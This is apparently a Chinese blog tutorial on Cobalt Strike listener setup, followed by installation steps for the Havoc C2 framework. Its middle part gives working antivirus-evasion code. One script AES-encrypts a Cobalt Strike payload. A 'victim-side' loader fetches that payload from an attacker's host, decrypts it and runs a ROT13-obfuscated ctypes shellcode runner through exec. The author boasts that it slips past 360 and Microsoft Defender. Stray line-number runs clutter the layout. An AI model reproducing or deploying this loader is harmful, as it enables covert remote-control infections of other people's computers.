cs使用与Havoc 安装

配置监听器:

  • 配置listener

    • 先配置一个用于反弹shell的监听器

      • #host配置为本地ip (ifconfig查看)
# port 配置为 用于接收反弹shell的 端口号
Http Hosts: 本地ip
HTTP HOST(Stager): 本地ip
HTTP Port(c2): 接收shell的端口

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35



        点击攻击>生成python 的payload ---下面使用我的脚本让受害者懵逼吧~



        ### 静态免杀 payload脚本及加载器py

        cs生成python 版本的payload(最新的360,微软杀毒pass,但运行报毒~~,娱乐使用hhh)

        ```python
        import  requests,re
        from Crypto.Cipher import AES
        from Crypto.Random import get_random_bytes
        import base64
        # file_path 为生成的payload 文件路径
        file_path='./payload.txt'	#替换下
        # url  为kali生成pyload文件下载链接
        url='http://192.168.175.131/6.py' #替换下
        res=requests.get(url).text
        match = re.search(r'buf = (".*?")', res, re.DOTALL)
        if match:
            data = match.group(1).replace('"','').encode() 
        key = get_random_bytes(16)
        iv = get_random_bytes(16)
        cipher_encrypt = AES.new(key, AES.MODE_CBC, iv)
        padding_length = 16 - len(data) % 16
        data += bytes([padding_length] * padding_length)
        encrypted_data = cipher_encrypt.encrypt(data)
        encoded_payload = base64.b64encode(iv + encrypted_data).decode()
        print('加密的key',key)
        with open(file_path,'w') as file:
            file.write(encoded_payload)
        print('done')

加载器:(受害者使用)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
import  requests,re
import ctypes
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
import base64
#为 payload.txt 返回的key
key= b'\x07 \xf0\xe1\x9a\xc1\xd5\xd1\xb0\xd0\x8f.9\x8eY\xb2' #替换
#可以下载生成payload.txt的url
url='http://192.168.175.131/payload.txt'    #替换
res=requests.get(url).text
decoded_data = base64.b64decode(res.encode())
iv_from_encoded = decoded_data[:16]
encrypted_data_from_encoded = decoded_data[16:]
cipher_decrypt = AES.new(key, AES.MODE_CBC, iv_from_encoded)
decrypted_data = cipher_decrypt.decrypt(encrypted_data_from_encoded)
padding_length = decrypted_data[-1]
decrypted_data = decrypted_data[:-padding_length]
whatfuck2 = bytes(decrypted_data.decode('unicode_escape'), 'latin1')
def Old_Six(passwds):
    Ojbk = ''
    for item in passwds:
        if (ord(item) >= ord('A') and ord(item) <= ord('M')) or (ord(item) >= ord('a') and ord(item) <= ord('m')):
            Ojbk += chr(ord(item) + 13)
        elif (ord(item) >= ord('N') and ord(item) <= ord('Z')) or (ord(item) >= ord('n') and ord(item) <= ord('z')):
            Ojbk += chr(ord(item) - 13)
        else:
            Ojbk += item
    Ojbk_o0Ol = Ojbk.replace('shellcode', 'whatfuck2')
    return Ojbk_o0Ol
what_ssss = "pglcrf.jvaqyy.xreary32.IveghnyNyybp.erfglcr=pglcrf.p_hvag64;ejkcntr = pglcrf.jvaqyy.xreary32.IveghnyNyybp(0, yra(furyypbqr), 0k1000, 0k40);pglcrf.jvaqyy.xreary32.EgyZbirZrzbel(pglcrf.p_hvag64(ejkcntr), pglcrf.perngr_fgevat_ohssre(furyypbqr), yra(furyypbqr));unaqyr = pglcrf.jvaqyy.xreary32.PerngrGuernq(0, 0, pglcrf.p_hvag64(ejkcntr), 0, 0, 0);pglcrf.jvaqyy.xreary32.JnvgSbeFvatyrBowrpg(unaqyr, -1)"
exec(Old_Six(what_ssss))

Havoc安装

项目地址:https://github.com/HavocFramework/Havoc

kali安装

翻墙工具:mihomo (最好翻墙)

使用说明: https://fanqiang.gitbook.io/fanqiang/linux

安装说明: https://github.com/HavocFramework/Havoc/blob/main/WIKI.MD

1
2
安装go 环境
apt install golang -y

windows 安装

https://www.cnblogs.com/bktown/p/18314327/compile-havoc-under-windows-z25dynx

环境:

https://github.com/msys2/msys2-installer/releases/download/2024-07-27/msys2-x86_64-20240727.exe

查看cmake 环境

1
pacman -Qs cmake

添加环境变量

1
export PATH="/c/msys64/mingw64/bin:$PATH"

刷新环境

1
source ~/.bashrc

验证安装

1
cmake --version

havoc